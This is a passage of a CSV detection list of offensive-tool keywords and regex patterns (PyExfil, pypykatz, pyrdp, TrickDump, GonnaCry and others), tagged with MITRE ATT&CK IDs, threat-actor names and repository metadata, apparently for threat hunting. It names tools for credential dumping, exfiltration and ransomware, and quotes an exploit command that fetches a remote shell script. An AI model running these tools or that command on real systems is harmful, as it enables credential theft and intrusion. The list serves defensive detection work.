"*pyexfil.includes.image_manipulation*",".{0,1000}pyexfil\.includes\.image_manipulation.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55956"
"*pyexfil.includes.prepare*",".{0,1000}pyexfil\.includes\.prepare.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55957"
"*PyExfil.MoriRT.com*",".{0,1000}PyExfil\.MoriRT\.com.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55958"
"*pyexfil.network*",".{0,1000}pyexfil\.network.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55959"
"*pyexfil.network.DB_LSP.dblsp*",".{0,1000}pyexfil\.network\.DB_LSP\.dblsp.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55960"
"*pyexfil.network.FTP.ftp_exfil*",".{0,1000}pyexfil\.network\.FTP\.ftp_exfil.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55961"
"*pyexfil.network.HTTP_Cookies.http_exfiltration*",".{0,1000}pyexfil\.network\.HTTP_Cookies\.http_exfiltration.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55962"
"*pyexfil.network.HTTPResp.client*",".{0,1000}pyexfil\.network\.HTTPResp\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55963"
"*pyexfil.network.ICMP.icmp_exfiltration*",".{0,1000}pyexfil\.network\.ICMP\.icmp_exfiltration.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55964"
"*pyexfil.network.SpoofIP.spoofIPs_client*",".{0,1000}pyexfil\.network\.SpoofIP\.spoofIPs_client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55965"
"*pyexfil.physical.qr.generator*",".{0,1000}pyexfil\.physical\.qr\.generator.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55966"
"*pyexfil.physical.wifiPayload.client*",".{0,1000}pyexfil\.physical\.wifiPayload\.client.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55967"
"*pyexfil.Stega.binoffset.binoffset*",".{0,1000}pyexfil\.Stega\.binoffset\.binoffset.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55968"
"*PYEXFIL_DEFAULT_PASSWORD*",".{0,1000}PYEXFIL_DEFAULT_PASSWORD.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","0","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55969"
"*pyExfil-latest.zip*",".{0,1000}pyExfil\-latest\.zip.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55970"
"*PyExfil-master*",".{0,1000}PyExfil\-master.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","55971"
"*pygpoabuse * -hashes lm:* -gpo-id *",".{0,1000}pygpoabuse\s.{0,1000}\s\-hashes\slm\:.{0,1000}\s\-gpo\-id\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55972"
"*pygpoabuse.py*",".{0,1000}pygpoabuse\.py.{0,1000}","offensive_tool_keyword","pyGPOAbuse","python implementation of SharpGPOAbuse","T1566.001 - T1059.006 - T1112","TA0001 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/Hackndo/pyGPOAbuse","1","1","N/A","N/A","8","5","416","48","2024-02-18T19:23:57Z","2020-05-10T21:21:27Z","55973"
"*pyherion.py*",".{0,1000}pyherion\.py.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","55974"
"*pyhon3 poc.py * curl http://*/shell.sh -o /tmp/shell.sh*",".{0,1000}pyhon3\spoc\.py\s.{0,1000}\scurl\shttp\:\/\/.{0,1000}\/shell\.sh\s\-o\s\/tmp\/shell\.sh.{0,1000}","offensive_tool_keyword","POC","Automated PoC exploitation of CVE-2021-44521","T1548 - T1190","TA0006 - TA0008","N/A","N/A","Exploitation tool","https://github.com/QHpix/CVE-2021-44521","1","0","#linux","N/A","N/A","1","9","2","2022-02-24T12:04:40Z","2022-02-24T11:07:34Z","55975"
"*pyinstaller -F barrel.py*",".{0,1000}pyinstaller\s\-F\sbarrel\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","55977"
"*pyinstaller -F --clean GonnaCry*",".{0,1000}pyinstaller\s\-F\s\-\-clean\sGonnaCry.{0,1000}","offensive_tool_keyword","GonnaCry","a linux ransomware","T1486 - T1059 - T1020 - T1083 - T1070","TA0040 - TA0005 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/tarcisio-marinho/GonnaCry","1","0","#linux","N/A","10","8","717","402","2025-01-24T13:39:57Z","2017-05-12T23:46:28Z","55978"
"*pyinstaller -F lock.py*",".{0,1000}pyinstaller\s\-F\slock\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","55979"
"*pyinstaller -F shock.py*",".{0,1000}pyinstaller\s\-F\sshock\.py.{0,1000}","offensive_tool_keyword","TrickDump","Dump lsass using only NTAPIS running 3 programs to create 3 JSON and 1 ZIP file and generate the Minidump later!","T1003.001 - T1027.002 - T1106 - T1212","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/ricardojoserf/TrickDump","1","0","N/A","N/A","10","5","444","50","2025-02-06T20:49:56Z","2024-06-24T12:24:59Z","55980"
"*pyinstaller netexec.spec*",".{0,1000}pyinstaller\snetexec\.spec.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","55981"
"*pyLAPS.py --action get -d * -u * -p * --dc-ip *",".{0,1000}pyLAPS\.py\s\-\-action\sget\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","55987"
"*pyLAPS-main*",".{0,1000}pyLAPS\-main.{0,1000}","offensive_tool_keyword","pyLAPS","A simple way to read and write LAPS passwords from linux.","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/p0dalirius/pyLAPS","1","1","#linux","N/A","9","2","105","16","2024-10-28T08:36:38Z","2021-10-05T18:35:21Z","55988"
"*pyMalleableC2*",".{0,1000}pyMalleableC2.{0,1000}","offensive_tool_keyword","cobaltstrike","Quick python utility I wrote to turn HTTP requests from burp suite into Cobalt Strike Malleable C2 profiles","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CodeXTF2/Burp2Malleable","1","1","N/A","N/A","10","10","385","34","2023-04-06T15:24:12Z","2022-08-14T18:05:39Z","55989"
"*pymultitor*",".{0,1000}pymultitor.{0,1000}","offensive_tool_keyword","pymultitor","Python Multi Threaded Tor Proxy. Did you ever want to be at two different places at the same time?   When I asked myself this question. I actually started developing this solution in my mind. While performing penetration tests there are often problems caused by security devices that block the attacking IP","T1071.001 - T1071.004 - T1055.008","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/realgam3/pymultitor","1","0","N/A","N/A","N/A","6","572","107","2024-02-25T20:40:50Z","2013-09-28T15:55:49Z","55990"
"*pyobfuscate = (*",".{0,1000}pyobfuscate\s\=\s\(.{0,1000}","offensive_tool_keyword","pyobfuscate","ADVANCED PYTHON OBFUSCATOR","T1027 - T1027.009","TA0005","N/A","N/A","Defense Evasion","https://pyobfuscate.com/pyd","1","0","N/A","N/A","8","10","N/A","N/A","N/A","N/A","55991"
"*pypykatz *",".{0,1000}pypykatz\s.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55992"
"*pypykatz lsa minidump *",".{0,1000}pypykatz\slsa\sminidump\s.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","0","N/A","private github repo","10","","N/A","","","","55993"
"*pypykatz lsa minidump*",".{0,1000}pypykatz\slsa\sminidump.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","55994"
"*pypykatz lsa minidump*",".{0,1000}pypykatz\slsa\sminidump.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords and commands Well known to extract plaintexts passwords. hash. PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash. pass-the-ticket or build Golden tickets","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55995"
"*pypykatz not installed*",".{0,1000}pypykatz\snot\sinstalled.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","55996"
"*pypykatz.commons*",".{0,1000}pypykatz\.commons.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55997"
"*pypykatz.dpapi*",".{0,1000}pypykatz\.dpapi.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55998"
"*pypykatz.exe*",".{0,1000}pypykatz\.exe.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","55999"
"*pypykatz.git*",".{0,1000}pypykatz\.git.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56000"
"*pypykatz.kerberos*",".{0,1000}pypykatz\.kerberos.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56001"
"*pypykatz.lsadecryptor*",".{0,1000}pypykatz\.lsadecryptor.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56002"
"*pypykatz.py*",".{0,1000}pypykatz\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56003"
"*pypykatz.pypykatz*",".{0,1000}pypykatz\.pypykatz.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","N/A","10","6","510","66","2025-03-28T10:40:27Z","2024-02-02T05:56:29Z","56004"
"*pypykatz.pypykatz*",".{0,1000}pypykatz\.pypykatz.{0,1000}","offensive_tool_keyword","spraykatz","Spraykatz is a tool without any pretention able to retrieve credentials on Windows machines and large Active Directory environments.","T1003 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1003.005 - T1003.006 - T1003.007 - T1003.008","TA0003 - TA0004 - TA0007","N/A","N/A","Credential Access","https://github.com/aas-n/spraykatz","1","0","N/A","N/A","9","8","763","121","2020-06-20T12:14:00Z","2019-09-09T14:38:28Z","56005"
"*pypykatz.registry*",".{0,1000}pypykatz\.registry.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56006"
"*pypykatz.zip*",".{0,1000}pypykatz\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","56007"
"*pypykatz_handler.py*",".{0,1000}pypykatz_handler\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","56008"
"*pypykatz_rekall.py*",".{0,1000}pypykatz_rekall\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56009"
"*pypykatzClass*",".{0,1000}pypykatzClass.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56010"
"*pypykatzfile*",".{0,1000}pypykatzfile.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","56011"
"*pypykatz-master.zip*",".{0,1000}pypykatz\-master\.zip.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","Black Basta","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","N/A","10","2989","394","2025-02-27T20:37:07Z","2018-05-25T22:21:20Z","56012"
"*Pyramid-main.zip*",".{0,1000}Pyramid\-main\.zip.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","Black Basta","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","N/A","10","8","727","89","2024-12-02T04:08:53Z","2022-08-13T11:51:37Z","56013"
"*pyrdp.core.mitm*",".{0,1000}pyrdp\.core\.mitm.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#content","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56014"
"*pyrdp.enum.rdp*",".{0,1000}pyrdp\.enum\.rdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#content","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56015"
"*pyrdp.logging.log*",".{0,1000}pyrdp\.logging\.log.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#content","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56016"
"*pyrdp.parser.rdp*",".{0,1000}pyrdp\.parser\.rdp.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#content","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56017"
"*pyrdp_output -*",".{0,1000}pyrdp_output\s\-.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56018"
"*pyrdp_scapy.py*",".{0,1000}pyrdp_scapy\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56019"
"*pyrdp-clonecert.py*",".{0,1000}pyrdp\-clonecert\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56020"
"*pyrdp-convert.py*",".{0,1000}pyrdp\-convert\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56021"
"*pyrdp-mitm *",".{0,1000}pyrdp\-mitm\s.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56022"
"*pyrdp-mitm.py*",".{0,1000}pyrdp\-mitm\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56023"
"*pyrdp-player.py*",".{0,1000}pyrdp\-player\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","N/A","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","56024"
